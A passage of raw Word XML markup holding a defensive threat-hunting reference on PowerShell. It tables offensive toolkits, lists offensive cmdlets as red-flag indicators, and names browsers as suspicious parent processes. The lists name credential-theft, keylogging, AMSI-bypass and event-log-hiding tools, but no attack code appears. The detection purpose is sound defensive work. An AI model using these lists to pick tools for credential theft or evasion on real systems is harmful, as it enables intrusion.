              <w:t>PowerShell wrapper for Mimikatz, used to dump credentials, hashes, and Kerberos tickets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="51E85C19" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="468393EC" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Invoke-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mimikittenz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40CEA04C" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Captures sensitive data from memory, such as passwords typed into browsers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="27244333" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A2218C7" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Offensive-PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="691D6122" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Collection of offensive scripts for enumeration, exploitation, and evasion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="00BB15B3" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3532B9F2" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Kautilya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76143827" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Toolkit for malicious payloads on USB devices (e.g., HID attacks).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="421352AA" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="243C2C4D" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Nishang</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="337C4943" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t xml:space="preserve">Large collection of offensive and post-exploitation scripts for red teaming and penetration testing. </w:t>
            </w:r>
            <w:hyperlink r:id="rId5" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="00AE2D4F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Github</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="048EA4A3" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A57123E" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>PoshRat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7963CBCE" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>RAT (Remote Access Trojan) built in PowerShell for persistence and control.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="232E1DAE" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F4EABFF" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>PowerShell Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38294AFA" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>General-purpose offensive scripts for exploitation and reconnaissance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="2F7B8821" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B357347" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>OWA-Toolkit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C94472F" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Targets Outlook Web Access for credential harvesting and exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="039A1F81" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31221A5A" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sherlock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0459C9AA" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Privilege escalation checker that identifies vulnerable Windows services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="5E5CC414" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AB759CD" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Invoke-Phant0m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76FCE150" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Hides malicious activity by disabling Windows Event Log service threads.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27DB2396" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00000000" w:rsidP="00AE2D4F">
      <w:r>
        <w:pict w14:anchorId="10EE1BC5">
          <v:rect id="_x0000_i1091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF0EFAF" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Offensive Cmdlets &amp; Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6227DD45" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve">These are </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>red-flag indicators</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> when seen in PowerShell scripts or logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6091F5" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>GPPPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> → Extracts Group Policy Preferences passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC4170" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>Get-Keystrokes → Keylogger functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF752EF" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>MicrophoneAudio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> → Records audio from microphone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A356E39" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>ModifiablePath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> → Finds paths vulnerable to privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED23A8E" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>TimedScreenshot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> → Captures periodic screenshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321D15C1" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>AllChecks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> → Runs multiple system checks for privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D8617C" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>AmsiBypass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> → Disables AMSI (Anti-Malware Scan Interface).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282099C1" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>DllInjection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> → Injects DLLs into processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B75470" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>Invoke-Mimikatz → Credential theft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652EFF90" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>NinjaCopy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> → Copies locked files stealthily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570F1DF7" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>PsUACme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> → Bypasses User Account Control (UAC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FD60B9" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>ReflectivePEInjection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> → Loads executables into memory without touching disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08748ACD" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>Invoke-Shellcode → Executes raw shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FD9C08" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> → Privilege escalation checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1157DCA4" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> → Active Directory enumeration and exploitation. </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00AE2D4F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>benjitrapp.github.io</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72B82B42" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00000000" w:rsidP="00AE2D4F">
      <w:r>
        <w:pict w14:anchorId="19AC1083">
          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E607F36" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Suspicious PowerShell Parent Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FCF462" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve">PowerShell launched from these processes is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>highly suspicious</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>, since they are not typical parents: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1"/>
        <w:gridCol w:w="4555"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="35F8B2D8" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61385587" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4935F4AF" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why Suspicious</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="0E82844E" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20F1D712" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>chrome.exe, firefox.exe, safari.exe, vivaldi.exe, microsoftedge.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78D495C4" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Browsers rarely spawn PowerShell; indicates exploitation via malicious scripts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="6289B210" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
